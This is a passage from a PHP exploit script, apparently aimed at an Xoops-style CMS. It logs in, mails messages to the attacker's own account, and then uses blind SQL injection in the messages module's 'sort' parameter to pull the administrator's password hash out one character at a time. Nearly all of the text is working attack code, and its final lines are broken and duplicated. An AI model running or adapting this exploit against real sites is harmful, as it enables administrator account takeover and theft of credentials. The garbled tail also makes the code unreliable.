while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); #debug #echo "\r\n".$html; } $host=$argv[1]; $path=$argv[2]; $uname=$argv[3]; $pass=$argv[4]; $prefix="exv2_"; $port=80; $proxy=""; for ($i=5; $i<$argc; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if ($temp=="-p") { $port=str_replace("-p","",$argv[$i]); } if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); } if ($temp=="-T") { $prefix=str_replace("-T","",$argv[$i]); } } if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} //login $data="uname=$uname&pass=$pass&op=login"; $packet ="POST ".$p."user.php HTTP/1.0\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Accept-Encoding: text/plain\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; sendpacketii($packet); $temp=explode("Set-Cookie: ",$html); $cookie=""; for ($i=1; $i<count($temp); $i++) { $temp2=explode(" ",$temp[$i]); $temp3=explode("\r",$temp2[0]); if (!strstr($temp3[0],";")){$temp3[0]=$temp3[0].";";} $cookie.=$temp3[0]; } echo "cookie ->".$cookie."\n"; //retrieve your user id $packet ="GET ".$p."edituser.php HTTP/1.0\r\n"; $packet.="Accept-Encoding: text/plain\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: ".$cookie."\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); $temp=explode("userinfo.php?uid=",$html); $temp2=explode("'",$temp[1]); $uid=(int)$temp2[0]; echo "uid -> ".$uid."\n"; //configure your message box, needed $data ="msg_mail=0"; $data.="&msg_showdisc=0"; $data.="&msg_showsend=0"; $data.="&update=0"; $data.="&op=config_save"; $data.="&submit=Save"; $packet ="POST ".$p."modules/messages/conf.php HTTP/1.0\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Accept-Encoding: text/plain\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Cookie: ".$cookie."\r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; sendpacketii($packet); sleep(1); //send to yourself some messages for ($i=2; $i>=1; $i ) { $data=' 7d626f251b00fa Content-Disposition: form-data; name="to_userid" '.$uid.' 7d626f251b00fa Content-Disposition: form-data; name="subject" 11111111111111111111111'.$i.' 7d626f251b00fa Content-Disposition: form-data; name="message" 11111111111111111111111 7d626f251b00fa Content-Disposition: form-data; name="MAX_FILE_SIZE" 256000 7d626f251b00fa Content-Disposition: form-data; name="msg_attachment"; filename="" 7d626f251b00fa Content-Disposition: form-data; name="msg_attachment[max_file_size]" 256000 7d626f251b00fa Content-Disposition: form-data; name="msg_attachment[accepted]" 7d626f251b00fa Content-Disposition: form-data; name="allow_html" 1 7d626f251b00fa Content-Disposition: form-data; name="allow_smileys" 1 7d626f251b00fa Content-Disposition: form-data; name="allow_bbcode" 1 7d626f251b00fa Content-Disposition: form-data; name="submit" Envoyer 7d626f251b00fa '; $packet="POST ".$p."modules/messages/pmlite.php HTTP/1.0\r\n"; $packet.="Content-Type: multipart/form-data; boundary= 7d626f251b00fa\r\n"; $packet.="Accept-Encoding: text/plain\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cookie: $cookie\r\n\r\n"; $packet.=$data; sendpacketii($packet); sleep(2); } //let's go $md5s[0]=0;//null $md5s=array_merge($md5s,range(48,57)); //numbers $md5s=array_merge($md5s,range(97,102));//a-f letters //print_r(array_values($md5s)); $j=1; $my_password=""; while (!strstr($my_password,chr(0))) { for ($i=0; $i<=255; $i++) { if (in_array($i,$md5s)) { $sql="(SELECT(IF((ASCII(SUBSTRING(pass,$j,1))=".$i."),msg_time,subject))F ROM/**/".$prefix."users/**/WHERE/**/rank=7/**/and/**/level=5)/**/ASC/**/L IMIT/**/1/*"; echo "sql -> ".$sql."\r\n"; $sql=urlencode($sql); $packet ="GET ".$p."modules/messages/index.php?sort=$sql&by=suntzu HTTP/1.0\r\n"; $packet.="Accept-Encoding: text/plain\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: ".$cookie."\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); if (!strstr($html,"111111111111111111111111")){$my_password.=chr($i);echo "password -> ".$my_password."[???]\n";sleep(1);break;} } if ($i==255) {die("Exploit failed ");} } $j++; } $j=1; $my_admin=""; while (!strstr($my_admin,chr(0))) . ".$p."modules/messages/pmlite.php HTTP/1.0 "; $packet.="Content-Type: multipart/form-data; boundary= 7d626f251b00fa "; $packet.="Accept-Encoding: text/plain ";